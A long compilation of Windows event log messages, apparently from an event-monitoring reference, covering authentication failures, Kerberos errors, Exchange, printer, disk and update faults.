The Security System has received an authentication request that could not be decoded. The request has failed.
Message:
WINS received a packet that has the wrong format. For example, a label may be More than 63 octets.
Message:
The length of the message sent by another WINS indicates a very big message. There may have been corruption of the data. WINS will ignore this message, terminate the connection with the remote WINS, and continue.
Message:
A RADIUS message was received from the invalid RADIUS client IP address 192.168.6.60.
Message:
The KDC received invalid messages of type changepassword.
Message:
An anonymous session connected from 192.168.6.60 has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller.
The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\TurnOffAnonymousBlock DWORD value to 1.
This message will be logged at most once a day.
Message:
EventSentry determined that "Process Tracking" is enabled and data will be now be collected.
Message:
EventSentry has successfully changed the Audit Policy and has enabled "Process Tracking". Process data will be now be collected.
Message:
EventSentry determined that "Process Tracking" is currently enabled and was unable to deactivate it. A call to change the current audit policy failed with error %1. Please see the EventSentry documentation for troubleshooting advice on this problem.
Message:
Process Tracking has been enabled but the "Log Size" properties of the Security event log are not configured properly. In order for Process Tracking to work reliably it is recommended that you reconfigure the security event log (with "Event Viewer") to "Overwrite events as needed".
Message:
EventSentry has successfully changed the Audit Policy and has disabled "Process Tracking". Process data will no longer be collected.
Message:
The configured temperature limit of %1 degrees (%3) has been exceeded, the current temperature is %2 degrees (%3).
Message:
The configured humidity limit of 60% has been exceeded, the current humidity level is 90%.
Message:
EventSentry was unable to find a temperature and/or humidity sensor on serial port %1. Please make sure the device is connected properly.
Message:
The database write interval for environment monitoring is set too small. The interval was automatically adjusted to %1 seconds.
Message:
Unable to open serial port %1 due to error "%2". Environment monitoring will not continue.
Message:
The temperature has fallen below the configured limit of %1 degrees (%3). The current temperature is %2 degrees (%3).
Message:
The humidity level has fallen below the configured limit of %1%. The current humidity level is %2%%.
Message:
The current temperature has fallen outside the configured range (%1%4 to %2%4). The current temperature is %3 degrees (%4).
Message:
The current humidity level has fallen outside the configured range (%1%% to %2%%). The current humidity level is %3%%.
Message:
The temperature (78.96 degrees F) is back in the configured range (60F to 78F)
Message:
The current humidity level is back in the configured range (10% to 70%). The current humidity level is 15%.
Message:
Change Password Attempt:
Target Account Name: ingmar
Target Domain: NETIKUS
Target Account ID: NETIKUS\ingmar
Caller User Name: ingmar
Caller Domain: NETIKUS
Caller Logon ID: (0x0,0xA467822)
Privileges: -
Message:
The currently selected KDC certificate was once valid, but now is invalid and no suitable replacement was found. Smartcard logon may not function correctly if this problem is not remedied. Have the system administrator check on the state of the domain's public key infrastructure. The chain status is in the error data.
Message:
The kerberos client received a KRB_AP_ERR_TKT_NYV error from the server TEST-W2K$. This indicates that the ticket used against that server is not yet valid (in relationship to that server time). Contact your system administrator to make sure the client and server times are in sync, and that the KDC in realm TESTGROUND.LOCAL is in sync with the KDC in the client realm.
Source:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80070643: Security Update for Flash Player (KB913433).
Message:
The DHCP/BINL service on this Small Business Server has encountered another server on this network with IP Address, 10.10.10.1, belonging to the domain: .
Message:
The DHCP/BINL service on this computer is shutting down. See the previous event log messages for reasons.
Message:
Automatic certificate enrollment for local system failed to enroll for one Directory Email Replication certificate (0x80070005). Access is denied.
Message:
A user hit their quota limit on volume C:.
Message:
Backup Exec Alert: Job Failed(Server: 'CWBAPP01') (Job: 'SQL SERVER DAILY - FULL') SQL SERVER DAILY - FULL -- The job failed with the following error: A failure occurred querying the Writer status. For more information, click the following link: http://eventlookup.veritas.com/eventlookup/EventLookup.jhtml
Message:
The timeout waiting for the performance data collection function "ABC" in the "C:\WINNT\system32\perf.dll" Library to finish has expired. There may be a problem with this extensible counter or the service it is collecting data from or the system may have been very busy when this call was attempted.
Source:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80070003: Security Update for Windows XP (KB873339).
Category:
Logging/Recovery
Message:
Information Store (324) First Storage Group: The backup has been stopped because it was halted by the client or the connection with the client failed.
Message:
DCOM got error "The service cannot be started, either because it is disabled or because it has no enabled devices associated with it. " attempting to start the service IISADMIN with arguments "" in order to run the server:
{A9E69610-B80D-11D0-B9B9-00A0C922E750}
Message:
Type: Success Audit
Description: Windows NT is shutting down.
All logon sessions will be terminated by this shutdown.
Message:
Type: Success Audit
Windows is starting up
Message:
DCOM was unable to communicate with the computer 192.168.x.xx using any of the configured protocols.
Message:
Windows cannot determine the user or computer name. (The specified user does not exist.). Group Policy processing aborted.
Message:
Unable to read local eventlog (reason: The data area passed to a system call is too small).
Message:
Scheduled Task created:
File Name: C:\WINDOWS\Tasks\Calculator.job
Command: C:\WINDOWS\system32\calc.exe
Triggers: At 11:48 AM every day, starting 11/14/2006.
Time: 11/14/2006 11:48:00 AM
Flags: 0x18000C0
Target User: EVENTSENTRY\User1
By:
User: User1
Domain: EVENTSENTRY
Logon ID: (0x0,0x127F30A0)
Message:
The shadow copies of volume C: were deleted because the shadow copy storage could not grow in time. Consider reducing the IO load on the system or choose a shadow copy storage volume that is not being shadow copied.
Message:
Logon Failure:
Reason: An error occurred during logon
User Name: TheUser
Domain: TheDomain
Logon Type: 11
Logon Process: User32
Authentication Package: Negotiate
Workstation Name: WORKSTATION01
Status code: 0xC000005E
Substatus code: 0x0
Message:
Authentication Ticket Request:
User Name: computer$
Supplied Realm Name: DOMAIN.LOCAL
User ID: -
Service Name: krbtgt/DOMAIN.LOCAL
Service ID: -
Ticket Options: 0x40810010
Result Code: 0x6
Ticket Encryption Type: -
Pre-Authentication Type: -
Client Address: 192.168.1.122
Certificate Issuer Name:
Certificate Serial Number:
Certificate Thumbprint:
Message:
The master browser has received a server announcement from the computer NT29 that believes that it is the master browser for the domain on transport NetBT_Tcpip_{492C50E8-6A5F-48B9-BA. The master browser is stopping or an election is being forced.
Message:
EFS does not support encryption over network sessions established using the NTLM protocol.
Message:
DS lookup for user USERNAME, connecting from 192.168.1.1, failed with error 0x80040920.
Message:
The mailbox for /o=First Organization/ou=first administrative group/cn=Recipients/cn=USERNAME has exceeded the maximum mailbox size. This mailbox cannot send or receive messages. Incoming messages to this mailbox are returned to sender. The mailbox owner should be notified about the condition of the mailbox as soon as possible.
Message:
Driver Lexmark W812 required for printer !!Shmata!Lexmark W812 is unknown. Contact the administrator to install the driver before you log in again.
Source:
Server ActiveSync
Message:
Unexpected Exchange mailbox Server error: Server: [EXCHANGE.yourdomain.local] User: [youruser@yourdomain.com] HTTP status code: [409]. Verify that the Exchange mailbox Server is working correctly.
Message:
The Open Procedure for service "ASP.NET_2.0.50727" in DLL "C:\WINNT\Microsoft.NET\Framework\v2.0.50727\aspnet_perf.dll" failed. Performance data for this service will not be available. Status code returned is data DWORD 0.
Source:
Application Error
Message:
Faulting application iexplore.exe, version 7.0.5730.11, faulting module flash9b.ocx, version 9.0.28.0, fault address 0x00072826.
Message:
Connections: blacklisted: xx.xx.xx.xx
Message:
WMI ADAP was unable to retrieve data from the PerfLib subkey: %1, error code: %2
Message:
Driver has encountered an internal error.
Message:
Product: Microsoft Visual Studio 2005 Premier Partner Edition - ENU -- Error 1718.File C:\WINDOWS\Installer\236249.msp did not pass the digital signature check. For more information about a possible resolution for this problem, see http://go.microsoft.com/fwlink/?LinkId=73863.
Message:
The installation of C:\WINDOWS\Installer\236249.msp is not permitted due to an error in software restriction policy processing. The object cannot be trusted.
Source:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80070643: Visual Studio 2005 Service Pack 1.
Message:
Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance. hr = 0x80040154.
Message:
The device, \Device\Harddisk0\D, has a bad block.
Message:
The certificate received from the remote server was issued by an untrusted certificate authority. Because of this, none of the data contained in the certificate can be validated. The SSL connection request has failed. The attached data contains the server certificate.
Message:
A zone transfer request for the secondary zone somedomain.local was refused by the master DNS server at 1.2.3.4. Check the zone at the master server 1.2.3.4 to verify that zone transfer is enabled to this server. To do so, use the DNS console, and select master server 1.2.3.4 as the applicable server, then in secondary zone somedomain.local Properties, view the settings on the Zone Transfers tab. Based on the settings you choose, make any configuration adjustments there (or possibly in the Name Servers tab) so that a zone transfer can be made to this server.
Source:
MSExchangeIS Mailbox Store
Category:
MTA Connections
Message:
Verify that the Microsoft Exchange MTA service has started. Consecutive ma-open calls are failing with error 3051.
Message:
The device Root\LEGACY_ERASERUTILDRV10710\0000 disappeared from the system without first being prepared for removal.
Source:
Office Server Search
Message:
The start address <http://xxx> cannot be crawled.
Context: Application 'ABC', Catalog 'Portal_Content'
Details:
Element not found.
(0x8002802b)
Message:
The COM+ Event System failed to create an instance of the subscriber 58FC39EB-9DBD-4EA7-B7B4-9404CC6ACFAB. StandardCreateInstance returned HRESULT 8000401A.
Message:
The redirector failed to determine the connection type.
Message:
Type: Failure Audit
Source: Security
Event Category: Account Logon
Event ID: 677
User: NT AUTHORITY\SYSTEM
Description: Service Ticket Request Failed:
User Name: UserName
User Domain: DomainName
Service Name: ServiceName
Ticket Options: 0x40830000
Failure Code: 0xE
Client Address: IPAddress
Message:
Event message 1
Event Type: Error
Event Source: DCOM
Event Category: None
Event ID: 10021
Date: Date
Time: Time
User: N/A
Computer: SMS SERVER
Description:
The launch and activation security descriptor for the COM Server application with CLSID {61738644-F196-11D0-9953-00C04FD919C1}. is invalid. It contains Access Control Entries with permissions that are invalid. The requested action was therefore not performed. This security permission can be corrected using the Component Services administrative tool.
Event message 2
Event Type: Error
Event Source: DCOM
Event Category: None
Event ID: 10016
Date: Date
Time: Time
User: NT AUTHORITY\SYSTEM
Computer: SMSSERVER
Description:
The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID {05D1D5D8-18D1-4B83-85ED-A0F99D53C885} to the user NT AUTHORITY\SYSTEM SID (S-1-5-18). This security permission can be modified using the Component Services administrative tool.
Category:
Initialization/Termination
Message:
Event Type: Warning
Event Source: Microsoft Fax
Event Category: Initialization/Termination
Event ID: 32026
Date: 16/11/2005
Time: 05:40:54
User: N/A
Computer: HOUSINGXP
Description:
Fax Service failed to initialize any assigned fax devices (virtual or
TAPI). No faxes can be sent or received until a fax device is
installed.
Source:
SQLAgent$SHAREPOINT
Message:
SQLAgent is not allowed to run.
Message:
SConnection: AuthFailureException: Authentication failure
Message:
This directory partition has not been backed up since at least the following number of days.
Directory partition:
DC=testdcgrnd,DC=local
'Backup latency interval' (days):
90
It is recommended that you take a backup as often as possible to recover from accidental loss of data. However if you haven't taken a backup since at least the 'backup latency interval' number of days, this message will be logged every day until a backup is taken. You can take a backup of any replica that holds this partition.
By default the 'Backup latency interval' is set to half the 'Tombstone Lifetime Interval'. If you want to change the default 'Backup latency interval', you could do so by adding the following registry key.
'Backup latency interval' (days) registry key:
System\CurrentControlSet\Services\NTDS\Parameters\Backup Latency Threshold (days)
Source:
Server Administrator
Category:
Storage Service
Message:
Virtual disk degraded: Virtual Disk 1 (Virtual Disk 1) Controller 0 (PERC 5/i Integrated)
Source:
Server Administrator
Category:
Storage Service
Message:
Physical disk removed: Physical Disk 0:0:0 Controller 0, Connector 0
Source:
Software Installation
Message:
Software Installation encountered an unexpected error while reading from the MSI file \\server\Software\Firefox\Firefox-2.0.0.4-en-US.msi. The error was not serious enough to justify halting the operation. The following error was encountered: The operation completed successfully.
Source:
MSExchangeTransport
Category:
Connection Manager
Message:
Message delivery to the remote domain 'somedomain.com' failed for the following reason: Unable to bind to the destination server in DNS.
Message:
The driver detected that the device \Device\Harddisk0\DR0 has its write cache enabled. Data corruption may occur.
Message:
The time service has not been able to synchronize the system time for 49152 seconds because none of the time providers has been able to provide a usable time stamp. The system clock is unsynchronized.
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Message:
Windows cannot obtain the domain controller name for your computer network. (A socket operation was attempted to an unreachable host. ). Group Policy processing aborted.
Category:
Printer Management
Message:
An error occured while retrieving client printer properties. Default printer properties will be used instead. Client name: () Printer: (Client/hostname#/printername) Printer driver: (Citrix Universal Printer)
Category:
Detailed Tracking
Message:
The Windows Firewall has detected an application listening for incoming traffic.
Name: -
Path: C:\WINDOWS\system32\eventsentry_svc.exe
Process identifier: 4840
User account: es_svc
User domain: DMN
Service: Yes
RPC server: No
IP version: IPv4
IP protocol: UDP
Port number: 2594
Allowed: No
User notified: No
Source:
MSExchangeTransport
Message:
Failed in reading Connector's DS Info Process Id: 1100 Process location: C:\WINNT\System32\inetsrv\inetinfo.exe ConnectorDN: CN=External Mail,CN=Connections,CN=First Routing Group,CN=Routing Groups,CN=First Administrative Group,CN=Administrative Groups,CN=APM,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=ad,DC=apm,DC=net,DC=au Hr:80040920 Attribute:[]
Message:
An error occurred while attempting to log in to the following server: "SERVER04\DMD_SERVER".
SQL error number: "4818".
SQL error message: "Login failed for user 'WSM1\Administrator'.
".
Message:
Client printer auto-creation failed. The driver could not be installed. Possible reasons for the failure: The driver is not in the list of drivers on the server. The driver cannot be located. The driver has not been mapped. Client name: (CALPC01445) Printer: (HP LaserJet 1020 (from CALPC01445) in session 33) Printer driver: (HP LaserJet 1020)
Message:
The Open Procedure for service 'ScanMail_Monitor' in DLL 'C:\WINNT\system32\SmxPerf.dll' failed. Performance data for this service will not be available. Status code returned is data DWORD 0.
Message:
Event from Fault: NT Log Monitor[0] : Event from NT System Log[TermServDevices] , Event: ID= 1111, Description: Driver SHARP AR-M277 PCL5e required for printer !!YOWOTTSRV007!OttSharpARM27701 is unknown. Contact the administrator to install the driver before you log in again.
Message:
The Open Procedure for service 'AppleTalk' in DLL 'C:\WINNT\system32\atkctrs.dll' failed. Performance data for this service will not be available. Status code returned is data DWORD 0.
Message:
Client printer auto-creation failed. The driver could not be installed. Possible reasons for the failure: The driver is not in the list of drivers on the server. The driver cannot be located. The driver has not been mapped. Client name: (YYZCHOSRVxxx) Printer: (CutePDF Writer (from YYZCHOSRVxxx) in session 112) Printer driver: (CutePDF Writer)
Message:
The browser service has failed to retrieve the backup list too many times on transport \Device\NetBT_Tcpip_6ADE6448-65A6-49CA-B8F8-686CE64294DC. The backup browser is stopping.
Source:
Domain Time Server
Message:
Another process has changed the clock rate from 156251/156250 to 156252/156250)
Message:
Unable to open shim database version registry key - v2.0.50727.00000
Message:
Windows has detected that Offline Caching is enabled on the Roaming Profile share - to avoid potential profile corruption, Offline Caching must be disabled on shares where roaming user profiles are stored.
Message:
Security policies were propagated with warning. 0x4b8 : An extended error has occurred.
For best results in resolving this event, log on with a non-administrative account and search http://support.microsoft.com for "Troubleshooting Event 1202's".
Source:
Removable Storage Service
Message:
RSM could not load media in drive Drive 0 of library Iomega RRD2.
Message:
Printer Driver HP Color LaserJet 2605dn_2605dtn PCL 6 for Windows NT x86 Version-3 was added or updated. Files:- UNIDRV.DLL, UNIDRVUI.DLL, HPC260d6.GPD, UNIDRV.HLP, hpzsc053.dtd, hpzst053.dll, hpc260d6.xml, hpc260dc.ini, hpzpp053.dll, hpzui053.dll, hpz6r053.dll, hpcdmc32.dll, hpbcfgre.dll, hpz6m053.gpd, hpzsm053.gpd, HPC260x6.GPD, hpzev053.dll, pclxl.dll, pjl.gpd, p6disp.gpd, pclxl.gpd, HPZHL053.CAB, STDNAMES.GPD, hpzls053.dll, hpzss053.dll, UNIRES.DLL.
Message:
Unable to move file E:\System Volume Information\20d5a57d-4de1-11dc-a8af-00101815f0e6{3808876b-c176-4e48-b7ae-04046e6cc752} after many attempts. Skipping file.
Message:
The process winlogon.exe has initiated the restart of PANTHER for the following reason: No title for this reason could be found
Minor Reason: 0xff
Shutdown Type: shutdown
Comment: The EventSentry agent is performing a shutdown/reboot of this computer.
Source:
Service Control Manager
Message:
The ABC service was unable to log on as DOMAIN\service.account with the currently configured password due to the following error:
Logon failure: unknown user name or bad password.
To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).
Message:
User Account password set:
Target Account Name: QA
Target Domain: WESTELL
Target Account ID: WESTELL\QA
Caller User Name: JHINT
Caller Domain: WESTELL
Caller Logon ID: (0x0,0x8F1A7AB5)
Message:
The DNS server encountered an invalid domain name in a packet from 128.252.19.21. The packet will be rejected. The event data contains the DNS packet.
Source:
Server Administrator
Message:
Controller log file entry: VD 00/0 is now OPTIMAL: Virtual Disk 0 (Virtual Disk 0) Controller 0 (PERC 5/i Integrated)
Source:
Server Administrator
Message:
Redundancy lost: Virtual Disk 0 (Virtual Disk 0) Controller 0 (PERC 5/i Integrated)
Source:
Server Administrator
Message:
Device failed: Physical Disk 1:0:9 Controller 0, Connector 1
Source:
Server Administrator
Message:
Virtual disk degraded: Virtual Disk 0 (Virtual Disk 0) Controller 0 (PERC 5/i Integrated)
Message:
Document 19, Name Of The Document Would Be Here owned by domainuser was printed on HP LaserJet 2420d via port IP_192.162.2.29. Size in bytes: 0; pages printed: 1
Message:
The document Name Of The Document Would Be Here owned by domainuser failed to print on printer HP LaserJet 2420d. Data type: NT EMF 1.008. Size of the spool file in bytes: 191336. Number of bytes printed: 0. Total number of pages in the document: 1. Number of pages printed: 0. Client machine: \\192.168.3.251. Win32 error code returned by the print processor: 0. The operation completed successfully.
Message:
The time service has detected that the system time needs to be changed by -2591998 seconds. The time service will not change the system time by more than -54000 seconds. Verify that your time and time zone are correct, and that the time source xxxx.xxxx.xxx (ntp.d|xx.xx.xx.xx:123->xx.xx.xx.xx:123) is working properly.
Source:
MSExchangeIS Mailbox Store
Message:
Exchange store 'First Storage Group\Mailbox Store (SERVER)': The logical size of this database (the logical size equals the physical size of the .edb file and the .stm file minus the logical free space in each) is 16 GB. This database size is approaching the size limit of 18 GB.
If the logical database size exceeds the maximum size limit, it will be dismounted on a regular basis.
For more information, click http://www.microsoft.com/contentredirect.asp.
Message:
Adapter 0 Channel 0 Target 2: Media Error Count=1, Other Error Count=0
Message:
OALGen will skip user entry '@ I-Tek GM-TIS Prod TivTalk' in address list '\Global Address List' because the SMTP address '' is invalid. - Default Offline Address List For more information, click http://www.microsoft.com/contentredirect.asp.
Message:
Login failed for user 'sa'. The user is not associated with a trusted SQL Server connection. [CLIENT: 202.98.221.121]
Message:
Windows cannot read the history of GPOs from the registry. Continuing Group Policy Processing.
Message:
The reason supplied by user SORTRITE\Craig McWilliams for the last unexpected shutdown of this computer is: Other (Unplanned)
Reason Code: 0xa000000
Bug ID:
Bugcheck String:
Comment: Do not know -- Craig.
Message:
Auto Client Reconnect attempted but failed due to incorrect cookie data. NOTE: If this error occurs frequently it may indicate an attempt to gain unauthorized access to the system.
Message:
Windows cannot determine the user or computer name. (Access is denied. ). Group Policy processing aborted.
Message:
A duplicate name has been detected on the TCP network. The IP address of the machine that sent the message is in the data. Use nbtstat -n in a command window to see which name is in the Conflict state.
Message:
DCOM got error '58' attempting to start the service StiSvc with arguments '' in order to run the server:A1F4E726-8CF1-11D1-BF92-0060081ED811
Message:
Pre-authentication failed:
User Name: WIN2008$
User ID: TESTGROUND\WIN2008$
Service Name: krbtgt/TESTGROUND.LOCAL
Pre-Authentication Type: 0x0
Failure Code: 0x19
Client Address: 192.138.23.31
Message:
This directory partition has not been backed up since at least the following number of days. Directory partition: DC=BarrettHospital,DC=local 'Backup latency interval' (days): 30 It is recommended that you take a backup as often as possible to recover from accidental loss of data. However if you haven't taken a backup since at least the 'backup latency interval' number of days, this message will be logged every day until a backup is taken. You can take a backup of any replica that holds this partition. By default the 'Backup latency interval' is set to half the 'Tombstone Lifetime Interval'. If you want to change the default 'Backup latency interval', you could do so by adding the following registry key. 'Backup latency interval' (days) registry key: System\CurrentControlSet\Services\NTDS\Parameters\Backup Latency Threshold (days)
Message:
A Kerberos Error Message was received:
on logon session
Client Time:
Server Time: 13:37:37.0000 12/14/2007 Z
Error Code: 0x34 KRB_ERR_RESPONSE_TOO_BIG
Extended Error:
Client Realm:
Client Name:
Server Realm: KDOMAIN.COM
Server Name: host/kap.kdomain.com
Target Name: host/kap.kdomain.com@KDOMAIN.COM
Error Text:
File: 9
Line: ae0
Error Data is in record data.
Message:
A Kerberos Error Message was received:
on logon session
Client Time:
Server Time: 13:34:51.0000 12/14/2007 Z
Error Code: 0xd KDC_ERR_BADOPTION
Extended Error: 0xc00000bb KLIN(0)
Client Realm:
Client Name:
Server Realm: KDOMAIN.COM
Server Name: host/kap.kdomain.com
Target Name: host/kap.kdomain.com@KDOMAIN.COM
Error Text:
File: 9
Line: ae0
Error Data is in record data.
Message:
DCOM got error '58' attempting to start the service gusvc with arguments '' in order to run the server:89DAE4CD-9F17-4980-902A-99BA84A8F5C8
Message:
DCOM got error '58' attempting to start the service gusvc with arguments '' in order to run the server:89DAE4CD-9F17-4980-902A-99BA84A8F5C8
Message:
Product: QuickBooks -- Error 1328.Error applying patch to file C:\Config.Msi\PT43.tmp. It has probably been updated by other means, and can no longer be modified by this patch. For more information contact your patch vendor. System Error: -1072807676
Message:
The Network Address Translator (NAT) was unable to request an operation of the kernel-mode translation module. This may indicate misconfiguration, insufficient resources, or an internal error. The data is the error code.
Message:
Error communicating with the Spooler system service. Open the Services snap-in and confirm that the Print Spooler service is running.
Message:
A desktop heap allocation failed.
Message:
The user DOMAIN\User connected to port VPN4-5 has been disconnected because no network protocols were successfully negotiated.
Source:
Server Administrator
Message:
Predictive Failure reported: Array Disk 0:4 Controller 0, Connector 0
Message:
Your computer was not able to renew its address from the network (from the DHCP Server) for the Network Card with network address 00508DB42684. The following error occurred:
The semaphore timeout period has expired.. Your computer will continue to try and obtain an address on its own from the network address (DHCP) server.
Source:
Unlocker application
Message:
\Device\UnlockerDriver5/
0000: 00 00 00 00 01 00 68 00 00 00 00 00 36 00 04 80
0001: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0002: 00 00 00 00 00 00 00 00
Message:
The following 2 service(s) are configured to AUTOSTART but are currently not running:Performance Logs and AlertsVirtual Machine Additions Shared Folder Service
Message:
Automatic certificate enrollment for local system failed to enroll for one Domain Controller certificate (0x80070005). Access is denied.
Message:
Microsoft (R) Windows (R) 5.02. 3790 Service Pack 2 Multiprocessor Free.
Message:
Login failed for user 'sa'. [CLIENT: 192.168.6.52]
Message:
The system detected an address conflict for IP address 172.20.5.14 with the system having network hardware address 00:07:E9:40:7C:40. Network operations on this system may be disrupted as a result.
Source:
Windows Update Agent
Message:
Installationsfehler: Die Installation des folgenden Updates ist mit Fehler 0x80070643 fehlgeschlagen: Sicherheitsupdate für Microsoft .NET Framework, Version 1.1 Service Pack 1 (KB928366)
Source:
Windows Update Agent
Message:
Installationsfehler: Die Installation des folgenden Updates ist mit Fehler 0x80070643 fehlgeschlagen: Sicherheitsupdate für Microsoft .NET Framework, Version 1.1 Service Pack 1 (KB928366)
Installation Error: the installation of the following update has failed with error 0x80070643: Security Update for Microsoft .NET Framework Verion 1.1 Service Pack 1 (KB928366)
Message:
Windows cannot load extensible counter DLL MSSQL$MS_ADMT, the first DWORD in data section is the Windows error code.
Source:
Microsoft-Windows-ApplicationExperienceInfrastructure
Message:
The application (OfficeScan Client, from vendor Trend Micro, INC.) has the following problem: OfficeScan Client is incompatible with this version of Windows. For more information, contact Trend Micro, INC..
Message:
SQL Server has encountered 136 occurrence(s) of cachestore flush for the 'Object Plans' cachestore (part of plan cache) due to some database maintenance or reconfigure operations.
Message:
SQLVDI: Loc=CVDS::Cleanup. Desc=Release(ClientAliveMutex). ErrorCode=(288)Attempt to release mutex not owned by caller.
. Process=2084. Thread=5976. Client. Instance=. VD=.
Message:
The following service was removed: CryptSvc4951 (CryptSvc4951). Last service state was Stopped.
Source:
.NET Runtime 2.0 Error Reporting
Message:
EventType clr20r3, P1 w3wp.exe, P2 6.0.3790.3959, P3 45d6968e, P4 mscorlib, P5 2.0.0.0, P6 471ebc5b, P7 416e, P8 a3, P9 system.argumentoutofrange, P10 NIL.
Source:
ASP.NET 2.0.50727.0
Message:
An unhandled exception occurred and the process was terminated.
Application ID: /LM/W3SVC/1694288962/ROOT/ReportingWebService
Process ID: 5568
Exception: System.ArgumentOutOfRangeException
Message: Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: index
StackTrace:
Server stack trace:
at System.Collections.ArrayList.get_Item(Int32 index)
at System.Collections.Specialized.StringCollection.get_Item(Int32 index)
at Microsoft.UpdateServices.Internal.Reporting.ExtendedData.ToString()
at Microsoft.UpdateServices.Internal.Reporting.ReportingEvent.ToString()
at Microsoft.UpdateServices.Internal.Reporting.DebugEventHandler.HandleEvent(IReportingInformation[] itemList)
at System.Runtime.Remoting.Messaging.StackBuilderSink._PrivateProcessMessage(IntPtr md, Object[] args, Object server, Int32 methodPtr, Boolean fExecuteInContext, Object[]
Category:
Heartbeat Monitoring
Message:
The AGENT status of host <HOSTNAME> (<GROUP>) remains at ERROR due to error "Access is denied.
".
Message:
Driver HP Color LaserJet 4600 PCL 6 required for printer !!swpma1fs1!MA1-POINT-COLOR-HP4600 is unknown. Contact the administrator to install the driver before you log in again.
Message:
Object Access Attempt:
Object Server: Security
Handle ID: 9780
Object Type: File
Process ID: 904
Image File Name: C:\WINDOWS\system32\svchost.exe
Accesses: WriteData (or AddFile)
AppendData (or AddSubdirectory or CreatePipeInstance)
Access Mask: 0x6
Source:
Application Error
Message:
Faulting application eventsentry_svc.exe, version 2.60.0.130, faulting module eventsentry_svc.exe, version 2.60.0.130, fault address 0x0002eafa.
Category:
Software Monitoring
Message:
Application 86C01576-F161-3624-9462-D87DE3243DC4 (using file ) was removed from the registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components and will no longer be run when a user logs into the system.
Source:
.NET Runtime Optimization Service
Message:
.NET Runtime Optimization Service (clr_optimization_v2.0.50727_32) - Failed to compile: Microsoft.ReportingServices.QueryDesigners, Version=9.0.242.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91 . Error code = 0x80070002
Message:
The server was unable to allocate from the system paged pool because the pool was empty.
Category:
Logging/Recovery
Message:
Information Store (284) First Storage Group: Attempted to attach database 'D:\Program Files\Exchsrvr\MDBDATA\priv1.EDB' but it is a database restored from a backup set on which hard recovery was not started or did not complete successfully.
Message:
Error 0xfffffde0 starting database "First Storage Group\Mailbox Store (SERVER)" on the Microsoft Exchange Information Store.
Message:
The MAPI call 'OpenMsgStore' failed with the following error:
The attempt to log on to the Microsoft Exchange Server computer has failed.
The MAPI provider failed.
Microsoft Exchange Server Information Store
ID no: 8004011d-0512-00000000
Source:
Microsoft-Windows-Perflib
Message:
The data buffer created for the "VMware" service in the "C:\Program Files\VMware\VMware Server\vmPerfmon.dll" library is not aligned on an 8-byte boundary. This may cause problems for applications that are trying to read the performance data buffer. Contact the manufacturer of this library or service to have this problem corrected or to get a newer version of this library.
Message:
The configuration information of the performance library "C:\WINDOWS\system32\aspperf.dll | infoctrs.dll | perfts.dll" for the "ASP | InetInfo | TermService" service does not match the trusted performance library information stored in the registry. The functions in this library will not be treated as trusted.
Category:
Detailed Tracking
Message:
Unprotection of auditable protected data.
Data Description:
Key Identifier: 575dfb1a-2f3a-4cdd-a08c-5e2bf47579ed
Protected Data Flags: 0x0
Protection Algorithms: 3DES-168 , SHA1-160
Failure Reason: 0x8009000B
Source:
MSExchangeIS Public Store
Message:
user@domain.com failed an operation on folder /O=ORG/OU=FIRST ADMINISTRATIVE GROUP/CN=RECIPIENTS/CN=OAB VERSION 3AD24215E446FED006D7E903A387A01BE4002721 on database "First Storage Group\Public Folder Store (SERVER)" because the user did not have the following access rights:
'Delete' 'Read Property' 'Write Property' 'Create Message' 'View Item' 'Create Subfolder' 'Write Security Descriptor' 'Write Owner' 'Read Security Descriptor' 'Contact'
The entry ID of the folder is in the data section of this event.
Source:
Microsoft-Windows-Kerberos-Key-Distribution-Center
Message:
The Key Distribution Center (KDC) cannot find a suitable certificate to use for smart card logons, or the KDC certificate could not be verified. Smart card logon may not function correctly if this problem is not resolved. To correct this problem, either verify the existing KDC certificate using certutil.exe or enroll for a new KDC certificate.
Message:
Unknown error on L1 -> L0
Message:
The DNS server has encountered numerous run-time events. To determine the initial cause of these run-time events, examine the DNS server event log entries that precede this event. To prevent the DNS server from filling the event log too quickly, subsequent events with Event IDs higher than 3000 will be suppressed until events are no longer being generated at a high rate.
Category:
Software Monitoring
Message:
Application 3087B10A-0736-6446-6DF0-F69FB0A3D2DA (using file ) was removed from the registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components and will no longer be run when a user logs into the system.
Source:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80070643: Update for .NET Framework 3.0: x86 (KB932471).
Message:
An error was detected on device \Device\Harddisk3\D during a paging operation.
Message:
The Windows NT 4.0 or earlier replication checkpoint with the PDC emulator master was unsuccessful.
A full synchronization of the security accounts manager (SAM) database to domain controllers running Windows NT 4.0 and earlier might take place if the PDC emulator master role is transferred to the local domain controller before the next successful checkpoint.
The checkpoint process will be tried again in four hours.
Additional Data
Error value:
1722 The RPC server is unavailable.
Source:
Microsoft-Windows-GroupPolicy
Message:
The processing of Group Policy failed. Windows attempted to read the file \\mydomain.local\SysVol\mydomain.local\Policies\D3610029-D721-41DA-ACE6-FD0CAF521432\gpt.ini from a domain controller and was not successful. Group Policy settings may not be applied until this event is resolved. This issue may be transient and could be caused by one or more of the following:
a) Name Resolution/Network Connectivity to the current domain controller.
b) File Replication Service Latency (a file created on another domain controller has not replicated to the current domain controller).
c) The Distributed File System (DFS) client has been disabled.
Source:
Office SharePoint Server
Category:
Office Server Shared Services
Message:
490684
Application
Warning
Office SharePoint Server
Office Server Shared Services
6801
REPORT
5/28/2008 12:00:01 AM
The OSS SQM Data Collection Job encountered a problem.
Reason: The site with the id 6543302f-5713-47ba-ac93-ba38dd1d9cd6 could not be found.
Technical Support Details:
